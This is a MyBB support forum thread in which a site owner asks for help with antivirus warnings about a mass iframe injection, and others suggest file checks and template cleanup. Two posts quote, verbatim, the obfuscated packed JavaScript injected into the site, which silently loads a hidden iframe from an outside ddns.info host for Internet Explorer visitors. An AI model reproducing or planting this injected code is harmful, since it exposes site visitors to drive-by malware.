MyBB Community Forums

Full Version: I think my site just tried to attack me.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Here'd what I got from Norton:
[Image: P6KQN.png]

Can someone tell me what it means? Thanks Allot!
run file verification tool from tools & maintenance section ... see also security vulnerability
I just went to your site, and scanned it with an AVG website scanner thing and nothing is being detected. Run the file verification tool as Ranjani suggested to check if anything has been modified.
(2011-10-21, 06:08 AM)Joshua Mayer Wrote: [ -> ]I just went to your site, and scanned it with an AVG website scanner thing and nothing is being detected. Run the file verification tool as Ranjani suggested to check if anything has been modified.

It appears all clean, but one of my friends said he got a attempted attack to from my site........... I don't know what it means "Mass Iframe Injection".........
Any clue what this code is at the bottom fo the page?

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'x://A-z.o.D/E.F?t=B\'}}5 2=y.r.q();7(((2.3("p")!=-1&&2.3("s")==-1&&2.3("u")==-1))&&2.3("w")!=-1){5 t=v("9()",C)}',42,42,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|ddns|msie|toLowerCase|userAgent|opera||webtv|setTimeout|windows|http|navigator|secure|certain|68381830|500|info|showthread|php'.split('|'),0,{}))
</script>
(2011-10-21, 09:15 PM)Paul H. Wrote: [ -> ]Any clue what this code is at the bottom fo the page?

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'x://A-z.o.D/E.F?t=B\'}}5 2=y.r.q();7(((2.3("p")!=-1&&2.3("s")==-1&&2.3("u")==-1))&&2.3("w")!=-1){5 t=v("9()",C)}',42,42,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|ddns|msie|toLowerCase|userAgent|opera||webtv|setTimeout|windows|http|navigator|secure|certain|68381830|500|info|showthread|php'.split('|'),0,{}))
</script>

No, not at all, do you know where I can delete that?


Also, I got a new report from Norton:

[Image: Tmy3I.png]
I already applied the patch......
but did you review the various threads that go over cleaning templates, cleaning config.php and settings.php? what about scanning for other non-MyBB files being added?
How do I do that? (sorry for being such a noob)
UPDATE: It seems to have something to do with ShowThread.php....
Pages: 1 2